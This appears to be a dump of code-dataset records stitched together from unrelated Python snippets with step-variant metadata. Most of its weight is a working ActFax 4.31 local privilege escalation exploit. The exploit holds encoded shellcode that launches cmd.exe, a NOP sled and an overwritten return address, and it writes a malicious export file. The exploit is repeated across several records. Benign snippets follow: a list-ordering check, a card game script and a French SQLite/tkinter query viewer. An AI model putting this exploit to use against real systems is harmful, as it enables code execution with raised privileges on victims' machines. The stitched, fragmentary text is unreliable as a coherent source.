"\x35\x32\x43\x32\x4d\x45\x34\x46\x4e\x35\x35\x43\x48\x45"
"\x35\x33\x30\x41\x41")
# Short NOP sled preceding the shellcode.
frontpad = "\x90" * 10
# Saved return address is overwritten with 0x00401B22, a RETN inside
# actfax.exe itself (no ASLR on the module), pivoting into the sled.
eip = "\x22\x1b\x40\x00"  # 00401B22 RETN actfax.exe
# Trailing NOP filler keeping the export record long enough.
backpad = "\x90" * 6000
# Overflow layout: [10 NOPs][shellcode][pad to offset 512][EIP][filler].
# 502 = distance from the start of sc to the saved return address.
buff = frontpad + sc + "\x90" * (502 - len(sc)) + eip + backpad
# Write an ActFax user-export (.exp) file; the tab-separated header row below
# mirrors the product's export format, and the oversized field that follows
# triggers the stack overflow when the file is imported.
f = open("pwnag3.exp", "w")
f.write(
"User Name\tEntire User Name\tPassword\tAlias-Names\tGroup\tDirect Dialing\tCost Account\tPermissions\tComments\tUser-Defined\t"
"Predefined Settings\tName 1\tName 2\tName 3\tName 4\tName 5\tDepartment\tAttention of\tPhone 1\tPhone 2\tFax Number\tE-Mail\t"
"Coverpage Non-Windows\tOverlay Non-Windows\tCoverpage Windows\tOverlay Windows\tUser-Defined\tPrinter Settings\tAutomatic Printing Outgoing\t"
"Printer Name Outgoing\tReport Outgoing\tAutomatic Printing Incoming\tPrinter Name Incoming\tReport Incoming\tNotification Outgoing\t"
"Email Outgoing\tNotification Incoming\tEmail Incoming\tAttach Original Message\tUser-Defined Archive Settings\tExport Outgoing\t"
"Export Incoming\tExport-Path\tMark as Read\x0d\x0a"+buff+"\x0d\x0a")
f.close()
|
flexible
|
{
"blob_id": "1b7048ef17b3512b9944ce7e197db27f4fd1aed0",
"index": 1687,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nf.write(\n 'User Name\\tEntire User Name\\tPassword\\tAlias-Names\\tGroup\\tDirect Dialing\\tCost Account\\tPermissions\\tComments\\tUser-Defined\\tPredefined Settings\\tName 1\\tName 2\\tName 3\\tName 4\\tName 5\\tDepartment\\tAttention of\\tPhone 1\\tPhone 2\\tFax Number\\tE-Mail\\tCoverpage Non-Windows\\tOverlay Non-Windows\\tCoverpage Windows\\tOverlay Windows\\tUser-Defined\\tPrinter Settings\\tAutomatic Printing Outgoing\\tPrinter Name Outgoing\\tReport Outgoing\\tAutomatic Printing Incoming\\tPrinter Name Incoming\\tReport Incoming\\tNotification Outgoing\\tEmail Outgoing\\tNotification Incoming\\tEmail Incoming\\tAttach Original Message\\tUser-Defined Archive Settings\\tExport Outgoing\\tExport Incoming\\tExport-Path\\tMark as Read\\r\\n'\n + buff + '\\r\\n')\nf.close()\n",
"step-3": "sc = (\n '\\x89åÛÎÙuôXPYIIIICCCCCCQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIKLZHMYEP5PS0CPMYJEVQHRU4LK62P0LK62DLLK0RR4LK42VH4O87QZ7VFQKOFQ9PNLGL51CLC26L10IQHO4MUQXGJBL00RPWLKPRR0LK72GLUQXPLKG03HK59P44PJ31N00PLKW8R8LK68Q031N3KSWLW9LKVTLKS1HV6QKOFQO0NLIQXOTMUQ9WP8KP2UZTS3CMKHGK3MFDSEZB68LK0XGTEQICE6LKDL0KLK68ULS1YCLKTDLKUQHPLI1TGT6DQK1KU1691J61KOM0QHQOPZLKUBZKMV1MRJEQLMMUOIEPS0S0F0BH6QLKROMWKO9EOKJPNU921FU8Y6MEOMMMKOXUWL5VSLDJMPKKM0RUUUOK775CRR2OCZC0V3KON52C2ME4FN55CHE530AA'\n )\nfrontpad = '\\x90' * 10\neip = '\"\\x1b@\\x00'\nbackpad = '\\x90' * 6000\nbuff = frontpad + sc + '\\x90' * (502 - len(sc)) + eip + backpad\nf = open('pwnag3.exp', 'w')\nf.write(\n 'User Name\\tEntire User Name\\tPassword\\tAlias-Names\\tGroup\\tDirect Dialing\\tCost Account\\tPermissions\\tComments\\tUser-Defined\\tPredefined Settings\\tName 1\\tName 2\\tName 3\\tName 4\\tName 5\\tDepartment\\tAttention of\\tPhone 1\\tPhone 2\\tFax Number\\tE-Mail\\tCoverpage Non-Windows\\tOverlay Non-Windows\\tCoverpage Windows\\tOverlay Windows\\tUser-Defined\\tPrinter Settings\\tAutomatic Printing Outgoing\\tPrinter Name Outgoing\\tReport Outgoing\\tAutomatic Printing Incoming\\tPrinter Name Incoming\\tReport Incoming\\tNotification Outgoing\\tEmail Outgoing\\tNotification Incoming\\tEmail Incoming\\tAttach Original Message\\tUser-Defined Archive Settings\\tExport Outgoing\\tExport Incoming\\tExport-Path\\tMark as Read\\r\\n'\n + buff + '\\r\\n')\nf.close()\n",
"step-4": "#!/usr/bin/python\r\n#Title: ActFax 4.31 Local Privilege Escalation Exploit\r\n#Author: Craig Freyman (@cd1zz)\r\n#Discovered: July 10, 2012\r\n#Vendor Notified: June 12, 2012\r\n#Description: http://www.pwnag3.com/2012/08/actfax-local-privilege-escalation.html\r\n\r\n#msfpayload windows/exec CMD=cmd.exe R | msfencode -e x86/alpha_upper -f c\r\n#[*] x86/alpha_upper succeeded with size 466 (iteration=1)\r\nsc = (\r\n\"\\x89\\xe5\\xdb\\xce\\xd9\\x75\\xf4\\x58\\x50\\x59\\x49\\x49\\x49\\x49\"\r\n\"\\x43\\x43\\x43\\x43\\x43\\x43\\x51\\x5a\\x56\\x54\\x58\\x33\\x30\\x56\"\r\n\"\\x58\\x34\\x41\\x50\\x30\\x41\\x33\\x48\\x48\\x30\\x41\\x30\\x30\\x41\"\r\n\"\\x42\\x41\\x41\\x42\\x54\\x41\\x41\\x51\\x32\\x41\\x42\\x32\\x42\\x42\"\r\n\"\\x30\\x42\\x42\\x58\\x50\\x38\\x41\\x43\\x4a\\x4a\\x49\\x4b\\x4c\\x5a\"\r\n\"\\x48\\x4d\\x59\\x45\\x50\\x35\\x50\\x53\\x30\\x43\\x50\\x4d\\x59\\x4a\"\r\n\"\\x45\\x56\\x51\\x48\\x52\\x55\\x34\\x4c\\x4b\\x36\\x32\\x50\\x30\\x4c\"\r\n\"\\x4b\\x36\\x32\\x44\\x4c\\x4c\\x4b\\x30\\x52\\x52\\x34\\x4c\\x4b\\x34\"\r\n\"\\x32\\x56\\x48\\x34\\x4f\\x38\\x37\\x51\\x5a\\x37\\x56\\x46\\x51\\x4b\"\r\n\"\\x4f\\x46\\x51\\x39\\x50\\x4e\\x4c\\x47\\x4c\\x35\\x31\\x43\\x4c\\x43\"\r\n\"\\x32\\x36\\x4c\\x31\\x30\\x49\\x51\\x48\\x4f\\x34\\x4d\\x55\\x51\\x58\"\r\n\"\\x47\\x4a\\x42\\x4c\\x30\\x30\\x52\\x50\\x57\\x4c\\x4b\\x50\\x52\\x52\"\r\n\"\\x30\\x4c\\x4b\\x37\\x32\\x47\\x4c\\x55\\x51\\x58\\x50\\x4c\\x4b\\x47\"\r\n\"\\x30\\x33\\x48\\x4b\\x35\\x39\\x50\\x34\\x34\\x50\\x4a\\x33\\x31\\x4e\"\r\n\"\\x30\\x30\\x50\\x4c\\x4b\\x57\\x38\\x52\\x38\\x4c\\x4b\\x36\\x38\\x51\"\r\n\"\\x30\\x33\\x31\\x4e\\x33\\x4b\\x53\\x57\\x4c\\x57\\x39\\x4c\\x4b\\x56\"\r\n\"\\x54\\x4c\\x4b\\x53\\x31\\x48\\x56\\x36\\x51\\x4b\\x4f\\x46\\x51\\x4f\"\r\n\"\\x30\\x4e\\x4c\\x49\\x51\\x58\\x4f\\x54\\x4d\\x55\\x51\\x39\\x57\\x50\"\r\n\"\\x38\\x4b\\x50\\x32\\x55\\x5a\\x54\\x53\\x33\\x43\\x4d\\x4b\\x48\\x47\"\r\n\"\\x4b\\x33\\x4d\\x46\\x44\\x53\\x45\\x5a\\x42\\x36\\x38\\x4c\\x4b\\x30\"\r\n\"\\x58\\x
47\\x54\\x45\\x51\\x49\\x43\\x45\\x36\\x4c\\x4b\\x44\\x4c\\x30\"\r\n\"\\x4b\\x4c\\x4b\\x36\\x38\\x55\\x4c\\x53\\x31\\x59\\x43\\x4c\\x4b\\x54\"\r\n\"\\x44\\x4c\\x4b\\x55\\x51\\x48\\x50\\x4c\\x49\\x31\\x54\\x47\\x54\\x36\"\r\n\"\\x44\\x51\\x4b\\x31\\x4b\\x55\\x31\\x36\\x39\\x31\\x4a\\x36\\x31\\x4b\"\r\n\"\\x4f\\x4d\\x30\\x51\\x48\\x51\\x4f\\x50\\x5a\\x4c\\x4b\\x55\\x42\\x5a\"\r\n\"\\x4b\\x4d\\x56\\x31\\x4d\\x52\\x4a\\x45\\x51\\x4c\\x4d\\x4d\\x55\\x4f\"\r\n\"\\x49\\x45\\x50\\x53\\x30\\x53\\x30\\x46\\x30\\x42\\x48\\x36\\x51\\x4c\"\r\n\"\\x4b\\x52\\x4f\\x4d\\x57\\x4b\\x4f\\x39\\x45\\x4f\\x4b\\x4a\\x50\\x4e\"\r\n\"\\x55\\x39\\x32\\x31\\x46\\x55\\x38\\x59\\x36\\x4d\\x45\\x4f\\x4d\\x4d\"\r\n\"\\x4d\\x4b\\x4f\\x58\\x55\\x57\\x4c\\x35\\x56\\x53\\x4c\\x44\\x4a\\x4d\"\r\n\"\\x50\\x4b\\x4b\\x4d\\x30\\x52\\x55\\x55\\x55\\x4f\\x4b\\x37\\x37\\x35\"\r\n\"\\x43\\x52\\x52\\x32\\x4f\\x43\\x5a\\x43\\x30\\x56\\x33\\x4b\\x4f\\x4e\"\r\n\"\\x35\\x32\\x43\\x32\\x4d\\x45\\x34\\x46\\x4e\\x35\\x35\\x43\\x48\\x45\"\r\n\"\\x35\\x33\\x30\\x41\\x41\")\r\n\r\nfrontpad = \"\\x90\" * 10 \r\neip = \"\\x22\\x1b\\x40\\x00\"\t#00401B22 RETN actfax.exe\r\nbackpad = \"\\x90\" * 6000\r\nbuff = frontpad + sc + \"\\x90\" * (502 - len(sc)) + eip + backpad\r\n\r\nf = open(\"pwnag3.exp\", \"w\")\r\nf.write(\r\n\"User Name\\tEntire User Name\\tPassword\\tAlias-Names\\tGroup\\tDirect Dialing\\tCost Account\\tPermissions\\tComments\\tUser-Defined\\t\"\r\n\"Predefined Settings\\tName 1\\tName 2\\tName 3\\tName 4\\tName 5\\tDepartment\\tAttention of\\tPhone 1\\tPhone 2\\tFax Number\\tE-Mail\\t\"\r\n\"Coverpage Non-Windows\\tOverlay Non-Windows\\tCoverpage Windows\\tOverlay Windows\\tUser-Defined\\tPrinter Settings\\tAutomatic Printing Outgoing\\t\"\r\n\"Printer Name Outgoing\\tReport Outgoing\\tAutomatic Printing Incoming\\tPrinter Name Incoming\\tReport Incoming\\tNotification Outgoing\\t\"\r\n\"Email Outgoing\\tNotification Incoming\\tEmail Incoming\\tAttach Original Message\\tUser-Defined Archive Settings\\tExport 
Outgoing\\t\"\r\n\"Export Incoming\\tExport-Path\\tMark as Read\\x0d\\x0a\"+buff+\"\\x0d\\x0a\")\r\nf.close()\r\n\r\n\r\n\r\n\r\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def play_43():
    """Read n, then n integers, from stdin; return 'Yes' if they are
    strictly increasing, 'no' otherwise.

    Compares every pair (i, j) with i < j and short-circuits with 'no'
    on the first pair where l[i] >= l[j].  The full pairwise scan is
    O(n^2); adjacent comparisons would suffice for this check.
    """
    n = int(input('Enter n :'))
    l = []
    for i in range(n):
        l.append(int(input()))
    for i in range(n - 1):
        for j in range(i + 1, n):
            if l[i] < l[j]:
                continue
            # Reached only when l[i] >= l[j]: order violated.
            return 'no'
    return 'Yes'
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def play_43():
n = int(input('Enter n :'))
l = []
for i in range(n):
l.append(int(input()))
for i in range(n - 1):
for j in range(i + 1, n):
if l[i] < l[j]:
continue
return 'no'
return 'Yes'
play_43()
<|reserved_special_token_1|>
def play_43():
    """Read n integers from stdin and report whether they are strictly increasing.

    Prompts for the count first, then one value per line.  Returns "Yes"
    when every earlier value is smaller than every later one, and "no" as
    soon as a non-increasing pair is found.
    """
    count = int(input('Enter n :'))
    values = [int(input()) for _ in range(count)]
    for left in range(count - 1):
        for right in range(left + 1, count):
            # Same check as the original (`continue` on <, fall through
            # to "no" otherwise), written as a direct guard.
            if values[left] >= values[right]:
                return "no"
    return "Yes"
play_43()
|
flexible
|
{
"blob_id": "1605396a6edb31dd6fe9238a0506f8cfeb794d07",
"index": 5568,
"step-1": "<mask token>\n",
"step-2": "def play_43():\n n = int(input('Enter n :'))\n l = []\n for i in range(n):\n l.append(int(input()))\n for i in range(n - 1):\n for j in range(i + 1, n):\n if l[i] < l[j]:\n continue\n return 'no'\n return 'Yes'\n\n\n<mask token>\n",
"step-3": "def play_43():\n n = int(input('Enter n :'))\n l = []\n for i in range(n):\n l.append(int(input()))\n for i in range(n - 1):\n for j in range(i + 1, n):\n if l[i] < l[j]:\n continue\n return 'no'\n return 'Yes'\n\n\nplay_43()\n",
"step-4": "def play_43():\n\tn=int(input('Enter n :'))\n\tl=[]\n\tfor i in range(n):\n\t\tl.append(int(input()))\n\tfor i in range(n-1):\n\t\tfor j in range(i+1,n):\n\t\t\tif l[i]<l[j]:\n\t\t\t\tcontinue\n\t\t\treturn \"no\"\n\treturn \"Yes\"\nplay_43()\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
if __name__ == '__main__':
print('New game!')
deck = Deck()
deck.shuffle()
players = deck.deal()
auction = Auction(players)
auction.bid()
tricks = Tricks(auction)
tricks.play()
<|reserved_special_token_1|>
from ob import *
if __name__ == '__main__':
print('New game!')
deck = Deck()
deck.shuffle()
players = deck.deal()
auction = Auction(players)
auction.bid()
tricks = Tricks(auction)
tricks.play()
<|reserved_special_token_1|>
from ob import *


def _run_game():
    """Play one complete game: deal the cards, hold the auction, play the tricks."""
    print('New game!')
    # Deal: shuffle a fresh deck and hand out the cards.
    deck = Deck()
    deck.shuffle()
    players = deck.deal()
    # Bid: run the auction among the dealt players.
    auction = Auction(players)
    auction.bid()
    # Play: the auction result drives the trick-taking phase.
    tricks = Tricks(auction)
    tricks.play()


if __name__ == "__main__":
    _run_game()
|
flexible
|
{
"blob_id": "06161b1f45e435d0273dd193229ad2ecfd46c625",
"index": 9002,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif __name__ == '__main__':\n print('New game!')\n deck = Deck()\n deck.shuffle()\n players = deck.deal()\n auction = Auction(players)\n auction.bid()\n tricks = Tricks(auction)\n tricks.play()\n",
"step-3": "from ob import *\nif __name__ == '__main__':\n print('New game!')\n deck = Deck()\n deck.shuffle()\n players = deck.deal()\n auction = Auction(players)\n auction.bid()\n tricks = Tricks(auction)\n tricks.play()\n",
"step-4": "from ob import *\n\nif __name__ == \"__main__\":\n # Game starts\n print('New game!')\n\n # Deal\n deck = Deck()\n deck.shuffle()\n players = deck.deal()\n\n # Bid\n auction = Auction(players)\n auction.bid()\n\n # Play\n tricks = Tricks(auction)\n tricks.play()\n\n\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
def taille_plus_grande_reponse(reponses):
    """
    Take a list as argument.
    Return the length of the largest element of the list, measured on
    its str() representation (0 for an empty list).
    """
    l = reponses
    maxi = 0
    for i in range(len(l)):
        # str() so non-string rows (tuples, ints) are measured too.
        if len(str(l[i])) > maxi:
            maxi = len(str(l[i]))
    return maxi
<|reserved_special_token_0|>
def affichage_question(dico, texte, titre='Question'):
"""
prend en argument dico un dictionnaire, texte une liste, et titre une chaine de caractère.
Renvoie une page tkinter où chaque indice de la liste texte est un bouton clickable et où titre et le nom de la page.
"""
fenetre = tkinter.Tk()
fenetre.title(titre)
for i in range(len(texte)):
bouton = {}
bouton[i] = Button(fenetre, text=texte[i], command=lambda n=i, dico
=dico: requete(n, dico))
bouton[i].pack()
fenetre.mainloop()
<|reserved_special_token_0|>
def requete(n, dico):
"""
prend en argument n l'indice de la requête dans le dictionnaire et dico un dictionnaire.
ne renvoie rien
"""
r = execute(n, dico)
afficher_table(execute(n, dico), dico[n][0])
<|reserved_special_token_0|>
def afficher_table(table, titre='', debut=0, fin=None):
"""
prend en argument table une liste et titre une chaine de caractère.
ne renvoie rien.
"""
if titre != '':
titre += '\n\n'
affichage(titre + texte_table(table, debut, fin), titre)
def texte_table(table, debut=0, fin=None):
"""
prend en argument table une liste.
renvoie une chaîne de caractère composé d'un tableau avec dans chaque case un élement de table.
"""
max = taille_plus_grande_reponse(table)
texte = '+' + max * '-' + '+\n'
for i in range(len(table)):
texte = texte + '|' + str(table[i]) + (max - len(str(table[i]))
) * ' ' + '|' + '\n+' + max * '-' + '+\n'
return texte
<|reserved_special_token_0|>
def texte_en_liste(nom_requete, repertoire):
requete = fichier_txt_en_texte(chemin(nom_requete, repertoire))
return requete.split()
<|reserved_special_token_0|>
def stocker_requete(dico, repertoire):
"""
prend en argument dico un dictionnaire vide et repertoire le nom du repertoir où sont sockés les requêtes.
ne renvoie rien
"""
liste = nom_element_du_repertoire(repertoire)
for i in range(len(liste)):
requete = separer_requete_et_question(liste[i], repertoire)
dico[i] = ['#' + str(i + 1) + ') ' + requete[0], requete[1]]
def afficher(dico):
"""
prend en argument un dictionnaire et renvoie ce disctionnaire.
"""
return dico
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def execute(n, dico):
"""
Prend en argument n, la position de la requête dans le dictionaire et dico le nom du dictionnaire.
Renvoie une liste dont chaque élément est une réponse de la requête.
"""
l = []
import sqlite3
conn = sqlite3.connect('imdb.db')
c = conn.cursor()
c.execute(dico[n][1])
for row in c:
l.append(row)
conn.close()
return l
def taille_plus_grande_reponse(reponses):
"""
Prend en argument une liste.
Renvoie la taille du plus grand élément de la liste.
"""
l = reponses
maxi = 0
for i in range(len(l)):
if len(str(l[i])) > maxi:
maxi = len(str(l[i]))
return maxi
<|reserved_special_token_0|>
def affichage_question(dico, texte, titre='Question'):
"""
prend en argument dico un dictionnaire, texte une liste, et titre une chaine de caractère.
Renvoie une page tkinter où chaque indice de la liste texte est un bouton clickable et où titre et le nom de la page.
"""
fenetre = tkinter.Tk()
fenetre.title(titre)
for i in range(len(texte)):
bouton = {}
bouton[i] = Button(fenetre, text=texte[i], command=lambda n=i, dico
=dico: requete(n, dico))
bouton[i].pack()
fenetre.mainloop()
<|reserved_special_token_0|>
def requete(n, dico):
"""
prend en argument n l'indice de la requête dans le dictionnaire et dico un dictionnaire.
ne renvoie rien
"""
r = execute(n, dico)
afficher_table(execute(n, dico), dico[n][0])
<|reserved_special_token_0|>
def afficher_table(table, titre='', debut=0, fin=None):
"""
prend en argument table une liste et titre une chaine de caractère.
ne renvoie rien.
"""
if titre != '':
titre += '\n\n'
affichage(titre + texte_table(table, debut, fin), titre)
def texte_table(table, debut=0, fin=None):
"""
prend en argument table une liste.
renvoie une chaîne de caractère composé d'un tableau avec dans chaque case un élement de table.
"""
max = taille_plus_grande_reponse(table)
texte = '+' + max * '-' + '+\n'
for i in range(len(table)):
texte = texte + '|' + str(table[i]) + (max - len(str(table[i]))
) * ' ' + '|' + '\n+' + max * '-' + '+\n'
return texte
<|reserved_special_token_0|>
def texte_en_liste(nom_requete, repertoire):
requete = fichier_txt_en_texte(chemin(nom_requete, repertoire))
return requete.split()
<|reserved_special_token_0|>
def creer_dictionnaire_vide():
"""
Ne contient aucun argument et renvoie un dictionnaire vide.
"""
dico = {}
return dico
def nom_element_du_repertoire(repertoire):
"""
prend en argument le nom d'un répertoire ranger dans le dossier projetsqlKilian.
renvoie une liste dont chaque élément est le nom d'un des fichier du repertoir.
"""
path = (
'C:\\Users\\Elève\\Desktop\\projet NSI\\projetsqlKilian\\projetsqlKilian\\'
+ repertoire)
nom_requete = os.listdir(path)
return nom_requete
def stocker_requete(dico, repertoire):
"""
prend en argument dico un dictionnaire vide et repertoire le nom du repertoir où sont sockés les requêtes.
ne renvoie rien
"""
liste = nom_element_du_repertoire(repertoire)
for i in range(len(liste)):
requete = separer_requete_et_question(liste[i], repertoire)
dico[i] = ['#' + str(i + 1) + ') ' + requete[0], requete[1]]
def afficher(dico):
"""
prend en argument un dictionnaire et renvoie ce disctionnaire.
"""
return dico
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def execute(n, dico):
    """Run the SQL query stored at index *n* of *dico* against imdb.db.

    Parameters:
        n: position of the request in the dictionary.
        dico: maps an index to ``[question_label, sql_text]``; the query
            text is read from ``dico[n][1]``.

    Returns:
        A list with one tuple per row produced by the query.
    """
    l = []
    import sqlite3
    # NOTE(review): assumes 'imdb.db' sits in the current working
    # directory -- confirm against how the app is launched.
    conn = sqlite3.connect('imdb.db')
    c = conn.cursor()
    c.execute(dico[n][1])
    # Iterating the cursor fetches the rows lazily, one at a time.
    for row in c:
        l.append(row)
    conn.close()
    return l
def taille_plus_grande_reponse(reponses):
    """Return the length of the longest element of *reponses*.

    Every element is measured on its ``str()`` representation, so
    non-string rows (tuples, ints) are handled too.

    Parameters:
        reponses: list of arbitrary elements (typically sqlite rows).

    Returns:
        The maximum ``len(str(element))``, or 0 for an empty list.
    """
    # max() with a generator replaces the manual accumulator loop;
    # default=0 preserves the original empty-input result.
    return max((len(str(element)) for element in reponses), default=0)
<|reserved_special_token_0|>
def affichage_question(dico, texte, titre='Question'):
    """Open a Tk window titled *titre* with one clickable button per entry of *texte*.

    Clicking button i runs the query stored at dico[i] through requete().
    Blocks in mainloop() until the window is closed.
    """
    fenetre = tkinter.Tk()
    fenetre.title(titre)
    for i in range(len(texte)):
        # NOTE(review): `bouton` is re-created on every iteration, so the
        # dict only ever holds the current button; a plain local would do.
        bouton = {}
        # Default arguments freeze i and dico per button, avoiding the
        # classic late-binding closure bug in the lambda callbacks.
        bouton[i] = Button(fenetre, text=texte[i], command=lambda n=i, dico
            =dico: requete(n, dico))
        bouton[i].pack()
    fenetre.mainloop()
<|reserved_special_token_0|>
def requete(n, dico):
    """Run the query stored at index *n* of *dico* and display its result table.

    Parameters:
        n: index of the request in the dictionary.
        dico: maps an index to ``[question_label, sql_text]``.

    Returns None; the rows are rendered via afficher_table() with the
    question label as the title.
    """
    # Bug fix: the original called execute(n, dico) twice -- once into an
    # unused variable `r` and once inline -- running the SQL query two
    # times per click.  Execute it once and reuse the result.
    afficher_table(execute(n, dico), dico[n][0])
<|reserved_special_token_0|>
def afficher_table(table, titre='', debut=0, fin=None):
    """Render *table* as a text grid and show it in a window titled *titre*.

    A non-empty title is separated from the grid by a blank line; the
    (possibly suffixed) title is also used as the window title, matching
    the original behaviour.
    """
    header = '' if titre == '' else titre + '\n\n'
    affichage(header + texte_table(table, debut, fin), header)
def texte_table(table, debut=0, fin=None):
    """Build an ASCII grid with one bordered cell per element of *table*.

    Every cell is space-padded to the width of the widest element
    (measured via taille_plus_grande_reponse); a horizontal border
    precedes the first cell and follows every cell.
    """
    width = taille_plus_grande_reponse(table)
    border = '+' + '-' * width + '+\n'
    pieces = [border]
    for row in table:
        cell = str(row)
        # str.ljust gives the same right-padding as the original's
        # manual (width - len(cell)) * ' ' concatenation.
        pieces.append('|' + cell.ljust(width) + '|\n' + border)
    return ''.join(pieces)
<|reserved_special_token_0|>
def fichier_txt_en_texte(fichier):
    """Return the whole content of the text file at path *fichier* as one string."""
    with open(fichier, 'r') as source:
        contenu = source.read()
    return contenu
def chemin(nom, repertoire):
"""
Prend en argument le nom du fichier où est stocké la requête et le nom du répertoire dans lequel est stocké la requête.
Renvoie le chemin de la requête.
"""
return repertoire + '/' + nom
def texte_en_liste(nom_requete, repertoire):
requete = fichier_txt_en_texte(chemin(nom_requete, repertoire))
return requete.split()
<|reserved_special_token_0|>
def creer_dictionnaire_vide():
"""
Ne contient aucun argument et renvoie un dictionnaire vide.
"""
dico = {}
return dico
def nom_element_du_repertoire(repertoire):
"""
prend en argument le nom d'un répertoire ranger dans le dossier projetsqlKilian.
renvoie une liste dont chaque élément est le nom d'un des fichier du repertoir.
"""
path = (
'C:\\Users\\Elève\\Desktop\\projet NSI\\projetsqlKilian\\projetsqlKilian\\'
+ repertoire)
nom_requete = os.listdir(path)
return nom_requete
def stocker_requete(dico, repertoire):
"""
prend en argument dico un dictionnaire vide et repertoire le nom du repertoir où sont sockés les requêtes.
ne renvoie rien
"""
liste = nom_element_du_repertoire(repertoire)
for i in range(len(liste)):
requete = separer_requete_et_question(liste[i], repertoire)
dico[i] = ['#' + str(i + 1) + ') ' + requete[0], requete[1]]
def afficher(dico):
"""
prend en argument un dictionnaire et renvoie ce disctionnaire.
"""
return dico
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def execute(n, dico):
"""
Prend en argument n, la position de la requête dans le dictionaire et dico le nom du dictionnaire.
Renvoie une liste dont chaque élément est une réponse de la requête.
"""
l = []
import sqlite3
conn = sqlite3.connect('imdb.db')
c = conn.cursor()
c.execute(dico[n][1])
for row in c:
l.append(row)
conn.close()
return l
def taille_plus_grande_reponse(reponses):
"""
Prend en argument une liste.
Renvoie la taille du plus grand élément de la liste.
"""
l = reponses
maxi = 0
for i in range(len(l)):
if len(str(l[i])) > maxi:
maxi = len(str(l[i]))
return maxi
<|reserved_special_token_0|>
def affichage_question(dico, texte, titre='Question'):
"""
prend en argument dico un dictionnaire, texte une liste, et titre une chaine de caractère.
Renvoie une page tkinter où chaque indice de la liste texte est un bouton clickable et où titre et le nom de la page.
"""
fenetre = tkinter.Tk()
fenetre.title(titre)
for i in range(len(texte)):
bouton = {}
bouton[i] = Button(fenetre, text=texte[i], command=lambda n=i, dico
=dico: requete(n, dico))
bouton[i].pack()
fenetre.mainloop()
<|reserved_special_token_0|>
def requete(n, dico):
"""
prend en argument n l'indice de la requête dans le dictionnaire et dico un dictionnaire.
ne renvoie rien
"""
r = execute(n, dico)
afficher_table(execute(n, dico), dico[n][0])
<|reserved_special_token_0|>
def afficher_table(table, titre='', debut=0, fin=None):
"""
prend en argument table une liste et titre une chaine de caractère.
ne renvoie rien.
"""
if titre != '':
titre += '\n\n'
affichage(titre + texte_table(table, debut, fin), titre)
def texte_table(table, debut=0, fin=None):
"""
prend en argument table une liste.
renvoie une chaîne de caractère composé d'un tableau avec dans chaque case un élement de table.
"""
max = taille_plus_grande_reponse(table)
texte = '+' + max * '-' + '+\n'
for i in range(len(table)):
texte = texte + '|' + str(table[i]) + (max - len(str(table[i]))
) * ' ' + '|' + '\n+' + max * '-' + '+\n'
return texte
<|reserved_special_token_0|>
def fichier_txt_en_texte(fichier):
"""
prend en argument le chemin d'un fichier texte
Renvoie le contenu du fichier texte sous forme de chaîne de caractère.
"""
with open(fichier, 'r') as requete:
return requete.read()
def chemin(nom, repertoire):
"""
Prend en argument le nom du fichier où est stocké la requête et le nom du répertoire dans lequel est stocké la requête.
Renvoie le chemin de la requête.
"""
return repertoire + '/' + nom
def texte_en_liste(nom_requete, repertoire):
requete = fichier_txt_en_texte(chemin(nom_requete, repertoire))
return requete.split()
def liste_en_texte(liste):
"""
prend en argument une liste et un indice et renvoie la même liste mais l'élement d'indice 'n' est transformé en texte.
"""
texte = ''
for i in range(len(liste)):
texte = texte + str(liste[i]) + ' '
return texte
<|reserved_special_token_0|>
def creer_dictionnaire_vide():
"""
Ne contient aucun argument et renvoie un dictionnaire vide.
"""
dico = {}
return dico
def nom_element_du_repertoire(repertoire):
"""
prend en argument le nom d'un répertoire ranger dans le dossier projetsqlKilian.
renvoie une liste dont chaque élément est le nom d'un des fichier du repertoir.
"""
path = (
'C:\\Users\\Elève\\Desktop\\projet NSI\\projetsqlKilian\\projetsqlKilian\\'
+ repertoire)
nom_requete = os.listdir(path)
return nom_requete
def stocker_requete(dico, repertoire):
"""
prend en argument dico un dictionnaire vide et repertoire le nom du repertoir où sont sockés les requêtes.
ne renvoie rien
"""
liste = nom_element_du_repertoire(repertoire)
for i in range(len(liste)):
requete = separer_requete_et_question(liste[i], repertoire)
dico[i] = ['#' + str(i + 1) + ') ' + requete[0], requete[1]]
def afficher(dico):
"""
prend en argument un dictionnaire et renvoie ce disctionnaire.
"""
return dico
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def execute(n, dico, db='imdb.db'):
    """
    Execute the SQL query stored at index n of the dictionary dico.

    n    -- position of the query in the dictionary
    dico -- dictionary of queries, shaped {n: [question, SQL text]}
    db   -- path of the SQLite database file (default 'imdb.db',
            the historical hard-coded value, so existing callers
            keep working)

    Return a list whose elements are the result rows (tuples).
    """
    import sqlite3
    conn = sqlite3.connect(db)
    try:
        # fetchall materialises every row of the cursor at once
        return conn.execute(dico[n][1]).fetchall()
    finally:
        # the connection is closed even if the query raises
        # (the original leaked it on error)
        conn.close()
def taille_plus_grande_reponse(reponses):
    """
    Take a list.
    Return the length (in characters) of its largest element once
    converted to text, or 0 for an empty list.
    """
    # default=0 reproduces the accumulator initialised to zero
    return max((len(str(element)) for element in reponses), default=0)
"""affichage question"""""""""""""""""""""""""""
from tkinter import *
def question(dico):
    """
    Take a dictionary of queries.
    Build the list of question labels (first element of each entry)
    then open the selection window. Returns nothing.
    """
    libelles = [dico[indice][0] for indice in range(len(dico))]
    affichage_question(dico, libelles)
def affichage_question(dico, texte, titre = "Question"):
    """
    Take dico a dictionary, texte a list of labels and titre a string.
    Open a tkinter window named titre where each element of texte is a
    clickable button launching the matching query; blocks in mainloop.
    """
    fenetre = tkinter.Tk()
    fenetre.title(titre)
    boutons = {}
    for indice, libelle in enumerate(texte):
        # n=indice freezes the current value (lambdas bind late)
        boutons[indice] = Button(
            fenetre, text=libelle,
            command=lambda n=indice, dico=dico: requete(n, dico))
        boutons[indice].pack()
